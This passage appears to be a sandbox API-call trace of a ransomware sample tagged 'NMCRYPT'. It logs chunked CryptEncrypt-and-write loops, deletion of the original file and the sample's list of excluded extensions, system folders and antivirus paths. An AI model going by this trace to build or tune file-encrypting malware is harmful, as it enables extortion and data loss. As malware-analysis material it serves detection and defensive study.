pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.768] GetLastError () returned 0x0 [0147.768] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.769] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.769] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.769] GetLastError () returned 0x0 [0147.769] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.769] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.769] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.769] GetLastError () returned 0x0 [0147.769] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.770] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.770] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.770] GetLastError () returned 0x0 [0147.770] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.770] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.770] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.770] GetLastError () returned 0x0 [0147.770] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.770] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.770] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.770] GetLastError () returned 0x0 [0147.770] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.770] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.770] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.770] GetLastError () returned 0x0 [0147.770] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.770] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.770] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.770] GetLastError () returned 0x0 [0147.770] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.770] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xc6, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xc6, lpOverlapped=0x0) returned 1 [0147.770] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xc6, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xd0) returned 1 [0147.770] GetLastError () returned 0x0 [0147.770] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xd0, lpOverlapped=0x0) returned 1 [0147.770] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.771] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0x20 [0147.771] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml", dwFileAttributes=0x20) returned 0 [0147.771] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 1 [0147.771] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0 [0147.771] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" [0147.771] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.771] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB422.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb422.tmp")) returned 0xb422 [0147.772] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB422.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb422.tmp"), dwFlags=0x1) returned 0 [0147.772] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB422.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb422.tmp")) returned 1 [0147.772] CryptDestroyKey (hKey=0x9ad738) returned 1 [0147.772] wcslen (_String="OK") returned 0x2 [0147.772] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.772] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.772] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0147.772] CryptDestroyHash (hHash=0x9ad138) returned 1 [0147.772] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0147.772] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.772] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*NMCRYPT") returned 0 [0147.772] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*Recovers your files.html") returned 0 [0147.772] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*.exe") returned 0 [0147.772] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*.dll") returned 0 [0147.772] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*.lnk") returned 0 [0147.772] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*.bat") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*.ini") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*.msi") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*.scf") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*pagefile.sys*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*AppData*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\winrar\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\java\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\windows\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\ESET\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\AVG\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*Atheros*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*Realtek*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*bootmgr*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*boot*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*boot*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*IO.SYS*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*ntldr*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*chrome*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*opera*") returned 0 [0147.773] PathMatchSpecW (pszFile="ipsptg.xml", pszSpec="*firefox*") returned 0 [0147.773] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml", pszSpec="*") returned 1 [0147.773] strlen (_Str="NMoreira") returned 0x8 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) 